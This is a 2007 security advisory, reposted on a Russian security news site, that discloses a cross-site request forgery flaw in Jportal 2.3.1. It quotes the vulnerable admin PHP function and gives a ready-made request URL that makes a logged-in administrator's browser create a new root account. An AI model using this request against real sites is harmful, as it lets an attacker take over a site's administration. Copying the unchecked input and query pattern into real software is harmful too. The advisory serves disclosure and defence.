Информационная безопасность

Уведомление о безопасности: Jportal 2.3.1 CSRF vulnerability
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Inertia News Remote File İnclude

  XSS in eWay

  XSS in lighttpd

  XSS in communityserver !

From:dzitu_(at)_poczta.fm <dzitu_(at)_poczta.fm>
Date:13 февраля 2007 г.
Subject:Jportal 2.3.1 CSRF vulnerability

Type: CSRF Attack / Input Validation Error
Remote: Yes
Version: 2.3.1 (very possible, that older versions are vulnerable too)
Problem is in admin/admin.adm.php:

function add_admin() {

global $name, $mail, $nick_, $action, $user_tbl, $access;
global $nick, $PHP_SELF, $_pass, $pass_, $acce, $op, $goto;

if($access=='root') {

if($_pass==$pass_) {


if($acce[news]=='') $acce[news]='n';
if($acce[info]=='') $acce[info]='n';
if($acce[art]=='') $acce[art]='n';
if($acce[sonda]=='') $acce[sonda]='n';
if($acce[link]=='') $acce[link]='n';
if($acce[forum]=='') $acce[forum]='n';
if($acce[comm]=='') $acce[comm]='n';
if($acce[menu]=='') $acce[menu]='n';
if($acce[bann]=='') $acce[bann]='n';
if($acce[topic]=='') $acce[topic]='n';
if($acce[file]=='') $acce[file]='n';



if($acce[root]<>'t') {

$acce_ = $acce[news].'-'.$acce[art].'-'.$acce[info].'-'.
$acce[sonda].'-'.$acce[link].'-'.$acce[forum].'-'.
$acce[comm].'-'.$acce[file].'-'.$acce[menu].'-'.
$acce[bann].'-'.$acce[topic];

} else {

$acce_ = 'root';

}


$query = "INSERT INTO $user_tbl VALUES(NULL, '$nick_', '".md5($_pass)."', '$name', now(), '$acce_', '$mail', 1)";
$result = mysql_query($query);

add_log('dodano administratora (ID '.mysql_insert_id().')');


if($goto=='')
header("Location: admin.php?op=$op");
else
header("Location: $goto");
exit;

As we can see, all variables comes from "nowhere" (i.e. it can be POST, GET, even COOKIE) and it's not checked, if script was launched by admin through admin panel or not. Due to this fact, if only admin has logged in and not logged out, if we let him send prepared request, we can get a root account (For example using our profile avatar).

http://vulnerable_jportal/admin.
php?op=admin&name=admin&mail=&nick_=admin&_pass=pass&pass_=ha
slo&acce%5Broot%5D=t&ok=dodaj&goto=&cmd=add

gives us root account with name "admin" and password "pass".

Dżitu
dzitu@poczta.fm
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server